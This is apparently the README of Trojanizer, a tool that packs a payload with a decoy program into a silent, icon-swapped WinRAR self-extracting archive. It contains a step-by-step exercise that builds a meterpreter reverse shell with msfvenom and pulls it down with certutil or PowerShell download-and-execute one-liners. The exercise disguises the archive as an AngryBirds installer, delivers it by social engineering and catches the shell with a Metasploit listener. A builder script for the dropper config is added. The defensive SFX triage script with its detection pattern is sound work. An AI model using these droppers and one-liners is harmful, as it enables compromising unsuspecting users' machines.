
r00t-3xp10it / Trojanizer

Trojanize your payload - WinRAR (SFX) automatization - under Linux distros




TROJANIZER

Version release : v1.1 (Stable)
Author : pedro ubuntu  [ r00t-3xp10it ]
Codename: Troia_Revisited
Distros Supported : Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam develop @2017



FRAMEWORK DESCRIPTION

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by the user
and turns them into a self-extracting executable (.exe) archive. When the SFX
archive is executed, it runs both files (our payload and the legit application)
at the same time.

To make the archive less suspicious to the target at execution time, Trojanizer
tries to replace the default icon (.ico) of the SFX file with a user-selected one
and suppresses all SFX archive dialogs (Silent=1 | Overwrite=1 in the SFX script).

'Trojanizer does not build trojans, but from the target's perspective it replicates trojan behavior'
(the payload executes in the background while the legit application executes in the foreground).





DEPENDENCIES (backend applications)

Zenity (bash GUIs) | Wine (x86|x64) | WinRAR.exe (installed in wine)
"Trojanizer.sh will download/install all dependencies as they are needed"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
|        It is recommended to edit and set the option: SYSTEM_ARCH=[ your_sys_arch ]        |
|        in the 'settings' file before attempting to run the tool for the first time.        |
╚────────────────────────────────────────────────────────────────────────────────────────────╝



PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If 'SINGLE_EXEC=ON' is selected in the settings file,
then trojanizer will accept any file extension as input.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All files that windows/SFX can auto-extract and open"




ADVANCED SETTINGS

╔─────────────────────────────────────────────────────────────────────────────────────────╗
|         Trojanizer 'advanced options' are only accessible in the 'settings' file,       |
|        and they can only be configured before running the main tool (Trojanizer.sh)     |
╚─────────────────────────────────────────────────────────────────────────────────────────╝

-- Presetup advanced option
Trojanizer can be configured to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allows users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs on the target system. If active, Trojanizer will ask (zenity dialog) for the command to be executed.

-- single_file_execution
Consider the following scenario: you have a DLL payload to input that you need to execute upon extraction, but SFX archives cannot execute DLL files directly. This setting allows users to input one batch script (.bat) that is going to be used to execute the DLL payload. All Trojanizer needs to do is instruct the SFX archive to extract both files and then execute the script.bat.

╔────────────────────────────────────────────────────────────────────────────────────────────────╗
|  single_file_execution switch default behavior is to compress the two files input by the user  |
|  but only execute one of them at extraction time (the second file input will be executed) ..   |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝
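The SFX script is the whole mechanism behind both the default trojan behavior (FRAMEWORK DESCRIPTION) and the two advanced switches above, so here is an added example, not code from the Trojanizer project, that generates that script for each mode and prints the rar.exe command line that packs the two files around it. The function names, the mode names and the RAR_EXE placeholder are this example's assumptions; the SFX directives (Path, Silent, Overwrite, Presetup, Setup) and the rar switches (-sfx, -z, -iicon, -ep) are WinRAR's documented ones. The demo at the end writes the Presetup variant with the certutil one-liner from the exercise further down; run the printed command only where wine and WinRAR are installed.

```shell
#!/usr/bin/env bash
# Added example (not Trojanizer's own code): build the WinRAR SFX "comment"
# script for the three behaviours described above and show the rar.exe call.
# RAR_EXE is a placeholder for rar.exe under wine (assumption).
set -eu

# sfx_comment MODE PAYLOAD DECOY [PRESETUP_CMD] -> prints the SFX script
#   trojan   : run both extracted files (payload first, decoy last)
#   single   : run only the decoy, like SINGLE_EXEC=ON (payload is just dropped)
#   presetup : single + run PRESETUP_CMD before extraction, like PRE_SETUP=ON
# Only basenames go into Setup= because the archive is built with -ep (no paths).
sfx_comment() {
  local mode=$1 payload=$2 decoy=$3 pre=${4:-}
  printf 'Path=%%temp%%\n'   # unpack into the user's temp dir, no folder prompt
  printf 'Silent=1\n'         # hide the extraction dialog
  printf 'Overwrite=1\n'      # overwrite existing files instead of asking
  case "$mode" in
    trojan)
      printf 'Setup=%s\nSetup=%s\n' "$(basename "$payload")" "$(basename "$decoy")" ;;
    single)
      printf 'Setup=%s\n' "$(basename "$decoy")" ;;
    presetup)
      [ -n "$pre" ] || { echo "presetup mode needs a command" >&2; return 2; }
      # Presetup= runs BEFORE extraction, so the payload can live off-archive
      printf 'Presetup=%s\nSetup=%s\n' "$pre" "$(basename "$decoy")" ;;
    *) echo "unknown mode: $mode" >&2; return 2 ;;
  esac
}

# sfx_command OUT.exe COMMENT_FILE ICON PAYLOAD DECOY -> prints the rar call
#   a       add to archive          -sfx     produce a self-extracting .exe
#   -z<f>   read SFX script from f  -iicon<f> replace the SFX module icon
#   -ep     store files without paths, so Setup= basenames resolve after extraction
#   -y      assume yes on prompts (wine has no console to answer them)
# Linux paths are fine under wine because it maps them through the Z: drive.
sfx_command() {
  local out=$1 comment=$2 icon=$3 payload=$4 decoy=$5
  printf 'wine %s a -y -ep -sfx -z%s -iicon%s %s %s %s\n' \
    "${RAR_EXE:-rar.exe}" "$comment" "$icon" "$out" "$payload" "$decoy"
}

# Demo: the Presetup + single_file_execution combination from the exercise.
demo() {
  local dir; dir=$(mktemp -d)
  sfx_comment presetup payload.exe AngryBirds.exe \
    'cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\payload.exe && start %TEMP%\payload.exe' \
    > "$dir/sfx.conf"
  echo "--- sfx.conf"; cat "$dir/sfx.conf"
  echo "--- rar command (dry run)"
  sfx_command AngryBirds_installer.exe "$dir/sfx.conf" Steam-logo.ico screenshot.png AngryBirds.exe
  rm -rf "$dir"
}
demo
```

The Setup= lines are what separate the two behaviours: trojan mode lists the payload first and the decoy second, while single mode lists only the decoy, so the payload is merely dropped into %temp% and has to be started by something else (the batch script from the DLL scenario above, or a Presetup= command).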



TROJANIZER AND APPL WHITELISTING BYPASSES

╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|   A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting  |
|   bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries.       |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝

The following exercise describes how to use the Trojanizer 'single_file_execution' and 'Presetup' advanced switches to
drop (remote download) and execute any payload using the 'certutil' or 'powershell' appl_whitelisting_bypass one-liners ..


1º - use metasploit to build our payload
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
     cp payload.exe /var/www/html/payload.exe
     service apache2 start

3º - edit Trojanizer 'settings' file and activate:
     PRE_SETUP=ON
     SINGLE_EXEC=ON

4º - run the Trojanizer tool
     PAYLOAD TO BE COMPRESSED => <path-to>/screenshot.png (it will not matter what you compress)
     EXECUTE THIS FILE UPON EXTRACTION => <path-to>/AngryBirds.exe (to be executed as decoy application)
     PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
     SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
     REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listener, and send the sfx archive to the target using social engineering
     msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'


╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|     When the sfx archive is executed, it will download payload.exe from our apache2 webserver to the target and    |
|  execute it before extracting 'screenshot.png' and 'AngryBirds.exe' (the latter is executed to serve as a decoy)   |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝


The following one-liner uses the 'powershell (DownloadFile + start)' method to achieve the same as the previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The following one-liner uses the 'powershell (IEX + DownloadString)' method to achieve almost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

Note that in the two cmd.exe-wrapped variants that write to disk, %TEMP% is expanded by cmd.exe before certutil or powershell ever see the path.
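On the receiving end of this exercise the SFX script is also the cheapest place to catch it, because it is stored as plain text in the archive comment. The following triage check is an added example, not part of Trojanizer, that reads such a script from a file and flags the directives the three one-liners above rely on: a Presetup= line, a download/execute one-liner in Presetup= or Setup=, extraction into %TEMP%, two Setup= lines (payload plus decoy), and Silent=1 combined with Overwrite=1. The two sample scripts are constructed for the example (192.0.2.10 is a documentation address) and the names sfx_triage/write_samples are this example's; pulling the comment out of a suspect .exe with your RAR tooling is left out.

```shell
#!/usr/bin/env bash
# Added triage check (not part of Trojanizer): read a WinRAR SFX script and
# flag the directives that turn an SFX archive into a downloader/dropper.
set -eu

# sfx_triage FILE -> prints one "flag: ..." line per finding; returns 1 if any
sfx_triage() {
  local f=$1 line key val setups=0 silent=0 overwrite=0 hits=0
  while IFS= read -r line || [ -n "$line" ]; do
    line=$(printf '%s' "$line" | tr -d '\r')   # SFX scripts are usually CRLF
    key=${line%%=*}
    val=${line#*=}
    case "$key" in
      Silent)    [ "$val" = 1 ] && silent=1 || : ;;
      Overwrite) [ "$val" = 1 ] && overwrite=1 || : ;;
      Path)
        case "$val" in
          *%[Tt][Ee][Mm][Pp]%*) echo "flag: extracts into %TEMP%: $val"; hits=$((hits+1)) ;;
        esac ;;
      Presetup)
        # Presetup runs BEFORE anything is extracted: the archived files can
        # be completely benign and the target is still compromised.
        echo "flag: Presetup command runs before extraction: $val"; hits=$((hits+1)) ;;
      Setup) setups=$((setups+1)) ;;
    esac
    case "$key" in
      Presetup|Setup)
        # the LOLBin download-and-execute shapes used in the exercise, plus the
        # usual neighbours (mshta/regsvr32/rundll32/wscript/cscript/bitsadmin)
        if printf '%s' "$val" | grep -iqE \
          'certutil.*-urlcache|powershell.*(-w(indowstyle)? +hidden|downloadfile|downloadstring|iex[[:space:](])|cmd(\.exe)? +/c|mshta|regsvr32|rundll32|wscript|cscript|bitsadmin'
        then
          echo "flag: $key launches a download/execute one-liner: $val"; hits=$((hits+1))
        fi ;;
    esac
  done < "$f"
  if [ "$setups" -ge 2 ]; then
    echo "flag: $setups Setup= lines (payload and decoy launched together)"; hits=$((hits+1))
  fi
  if [ "$silent" = 1 ] && [ "$overwrite" = 1 ]; then
    echo "flag: Silent=1 + Overwrite=1 (no dialogs, existing files clobbered)"; hits=$((hits+1))
  fi
  [ "$hits" -eq 0 ]
}

# write_samples DIR -> two constructed SFX scripts: the exercise's dropper and
# an ordinary installer that must not be flagged
write_samples() {
  cat > "$1/dropper.txt" <<'EOF'
Path=%temp%
Silent=1
Overwrite=1
Presetup=cmd.exe /c certutil -urlcache -split -f http://192.0.2.10/payload.exe %TEMP%\payload.exe && start %TEMP%\payload.exe
Setup=AngryBirds.exe
EOF
  cat > "$1/installer.txt" <<'EOF'
Title=Example Setup
Path=%ProgramFiles%\Example
Overwrite=1
Setup=setup.exe
EOF
}

# Demo over the two constructed scripts
d=$(mktemp -d)
write_samples "$d"
for s in dropper installer; do
  echo "== $s.txt"
  sfx_triage "$d/$s.txt" && echo "verdict: nothing flagged" || echo "verdict: suspicious"
done
rm -rf "$d"
```

The dropper sample trips four flags (the %TEMP% path, the Presetup line, the certutil one-liner inside it, and Silent+Overwrite) while the installer sample trips none; a single Setup= line with Overwrite=1 is what a legitimate SFX installer looks like, so neither of those is flagged on its own.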




DOWNLOAD/INSTALL

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set file execution permissions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh




Framework Screenshots (captions only; the images are not reproduced here)

xsf.conf - execute both files upon extraction (trojan behavior)
xsf.conf - single_file_execution + Presetup (advanced options)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
Final sfx archive with icon changed
Inside the sfx archive (open with winrar) - trojan behavior
Inside the sfx archive (open with winrar) - single_file_execution




Video tutorials

Trojanizer - AVG anti-virus fake installer (trojan behavior)
https://www.youtube.com/watch?v=BIn6_ccZrI0

Trojanizer - single_file_execution (not trojan behavior)
https://www.youtube.com/watch?v=Ze0JkVtKbns



Special thanks:

@subTee | @enigma0x3 | @H4d3s (SSA)

References:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

Report bugs:

https://github.com/r00t-3xp10it/trojanizer/issues

-- Suspicious-Shell-Activity© (SSA) RedTeam develop @2017 --
